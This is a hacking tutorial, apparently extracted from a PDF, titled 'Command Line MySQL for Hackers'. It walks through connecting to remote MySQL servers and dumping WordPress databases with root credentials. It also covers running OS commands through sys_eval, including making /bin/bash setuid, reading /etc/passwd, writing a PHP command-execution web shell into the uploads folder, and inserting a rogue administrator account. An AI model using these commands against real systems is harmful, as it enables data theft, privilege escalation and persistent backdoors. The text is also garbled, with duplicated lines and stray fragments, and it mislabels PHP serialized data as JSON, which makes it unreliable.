COMMAND LINE MYSQL FOR HACKERS

Learning to connect to a MySQL server via command line is extremely useful in many situations
especially for penetration testing. It’s quick, easy to learn and the fastest way to get in.

General MySQL CLI

Connect to the Database

This command will log you into the MySQL server with user “user” on host address 192.168.0.26.

mysql -u user -p -h 192.168.0.26

mysql -u user -p -h 192.168.0.26

┌─[✗]─[user@parrot]─[~]

└──╼ $ nmap -sV 127.0.0.1

Enter password: <br> Welcome to the MariaDB monitor. Commands end with ; or \g.<br><br> Your
MySQL connection id is 4 <br> <br> Server version: 5.7.28-0ubuntu0.16.04.2 (Ubuntu) <br><br> <br>
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. <br><br> <br> Type ‘help;’ or
‘\h’ for help. Type ‘\c’ to clear the current input statement. <br><br> <br> MySQL [(none)]>

(Gutenberg Terminal Display)

View and Connect to a Database

To see what databases are available to the user you’ve logged in with type the “show” command. To
start viewing information about the database use the “use” command.”.

show databases;

use databasename;

show databases;

use databasename;

Tricks!
# execute commands against mysql

mysql -u user -p --execute="show databases"

# execute commands against mysql

mysql -u user -p --execute="show databases"

Table Viewing and Manipulation

The two most important things you should know is how to see the tables of a database and view the
definition.

show tables;

select * from tablename;

show tables;

select * from tablename;

To see information about a table such as a schema use the “describe” command.

describe tablename;

describe tablename;

Advanced MySQL Commands for Hackers

Creating Local Database

create database wp_hacked;

use wp_hacked;

create database wp_hacked;

use wp_hacked;

Importing data from a SQL file is easy…

mysql -u root -p database < wp_db.sql

mysql -u root -p database < wp_db.sql

Ex-filtrating Database Schema

The user is “root” and the password is “plbkac”.. Yes, there isn’t a space between “-p” and the
password. That is the way you do it…

mysqldump --no-data -h 192.168.0.26 -u root -pplbkac wordpress > wp_db.sql

mysqldump --no-data -h 192.168.0.26 -u root -pplbkac wordpress > wp_db.sql

If you just want one table with no data… try this…

mysqldump -d -h 192.168.0.26 -u root -pplbkac wordpress wp_users > wp_users.sql

mysqldump -d -h 192.168.0.26 -u root -pplbkac wordpress wp_users > wp_users.sql

Ex-filtrating Data

mysqldump --tab=/tmp -h 192.168.0.34 -u root -pplbkac wordpress wp_users wp_users;

mysqldump --tab=/tmp -h 192.168.0.34 -u root -pplbkac wordpress wp_users wp_users;

Running System Commands

select sys_eval("whoami");

select sys_eval("chmod u+s /bin/bash");

select sys_eval("whoami");

select sys_eval("chmod u+s /bin/bash");

Reading Data

It is possible to read sensitive files using MySQL commands.

select load_file("/etc/shells");

select load_file("/etc/passwd");
1

select load_file("/etc/shells");

select load_file("/etc/passwd");

Create Backdoor PHP Script

This will create a PHP backdoor script that will execute commands against the system. You can easily
call home with a reverse shell.

SELECT "<?php echo system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/wp-

content/uploads/shell.php";

SELECT "<?php echo system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/wp-

content/uploads/shell.php";

WordPress Privilege Escalation

You can create a new user with administrative access very easily using SQL. There are 2 tables and 3
sets of data the must be inserted to accomplish this. If you don’t want to create a new user and have
compromised a low privileged user you can use SQL to elevate your privileges by updating the
wp_usermeta table. Adjusting the meta_value for the meta_keys “wp_capabilities” and
“wp_user_level” will elevate access if done correctly.

This script isn’t 100% accurate. WordPress no longer users MD5 hashes for passwords. There’s a
script that adds a salt in WordPress. You’ll have to reset your password or copy in a known user’s
password.

The key thing about WordPress is understanding how data is saved. Some of the data in WordPress
is saved in composite JSON strings.

a:1:{s:6:"author";b:1;}

You can’t just change “author” to “administrator”. The “s” stands for string and the 6 means it is 6
characters long. You must update the entire JSON string to make this work.

a:1:{s:13:"administrator";s:1:"1";}

You will need to find the TOP value for the ID. This will not work if the ID already exists.
INSERT INTO `wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`,
`user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('8', 'gotcha',
MD5('demo'), 'Your Name', 'gotcha@hackaco.com', 'http://www.hackaco.com/', '2019-11-
2100:00:00', '', '0', 'L33t Haxor');

INSERT INTO `wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '8',
'wp_capabilities', 'a:1:{s:13:"administrator";s:1:"1";}');

INSERT INTO `wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '8',
'wp_user_level', '10');

INSERT INTO `wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`,

`user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('8', 'gotcha',
MD5('demo'), 'Your Name', 'gotcha@hackaco.com', 'http://www.hackaco.com/', '2019-11-
2100:00:00', '', '0', 'L33t Haxor');

INSERT INTO `wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '8',
'wp_capabilities', 'a:1:{s:13:"administrator";s:1:"1";}');

INSERT INTO `wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '8',
'wp_user_level', '10');

Extracting WordPress Hashes for John

By concatenating the user login and password we can better extract data ready for John the Ripper.